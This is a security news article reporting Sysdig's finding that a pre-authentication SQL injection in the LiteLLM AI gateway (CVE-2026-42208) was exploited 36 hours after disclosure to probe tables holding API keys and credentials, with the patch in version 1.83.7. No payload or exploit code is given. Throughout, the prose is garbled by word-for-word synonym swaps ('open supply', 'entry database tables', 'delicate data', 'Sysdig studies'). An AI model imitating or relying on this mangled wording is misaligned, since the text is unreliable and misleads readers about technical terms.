A critical-severity vulnerability within the open supply AI gateway LiteLLM was exploited days after public disclosure to entry database tables containing delicate data, Sysdig studies.
The safety defect is described as an SQL injection through the proxy API key verification course of and is recognized as CVE-2026-42208, with a CVSS rating of 9.3.
In an April 20 advisory, LiteLLM’s maintainers defined {that a} database question used throughout key verification didn’t cross the caller-supplied worth as a separate parameter, together with it within the question as a substitute.
This allowed an unauthenticated attacker to ship a specifically crafted Authorization header to any LLM API route and entry the question through the proxy’s error-handling path.
“The decision occurs earlier than authentication (auth) is set, so the injection is absolutely pre-auth: any HTTP consumer that may attain the proxy port is adequate,” Sysdig notes.
By exploiting the problem, the attacker may entry the LiteLLM proxy’s database to learn and probably modify knowledge, permitting them to leak credentials saved within the database.
On April 24, the advisory was listed within the GitHub Advisory database, and the primary assaults exploiting the flaw have been noticed 36 hours later, Sysdig says.
The cybersecurity agency noticed the attackers particularly focusing on three database tables containing delicate data resembling API keys, supplier credentials, and the proxy’s surroundings variable configuration.
“The operator already knew LiteLLM’s Prisma-generated PostgreSQL identifier casing and ran a textbook column-count discovery sweep in opposition to every goal desk,” Sysdig explains.
Regardless of the focused nature of the assaults, no continuation was noticed, and the extracted keys and credentials haven’t been abused.
The noticed assaults, the cybersecurity agency says, have been carried out 21 minutes aside, possible by an automatic device that used the identical payload however rotated the origin IP addresses.
“The novelty of this discovering is the pace and precision of the schema-enumeration try, not a confirmed compromise,” Sysdig notes.
LiteLLM model 1.83.7 resolves the vulnerability by making certain that the caller-supplied worth is at all times handed as a separate parameter. Customers are suggested to replace to the patched launch as quickly as attainable or to disable error logs to mitigate the exploitation path.
Associated: 38 Vulnerabilities Present in OpenEMR Medical Software program
Associated: Chrome 147, Firefox 150 Safety Updates Rolling Out
Associated: No Patch for New PhantomRPC Privilege Escalation Approach in Home windows
Associated: OpenSSH Flaw Permitting Full Root Shell Entry Lurked for 15 Years
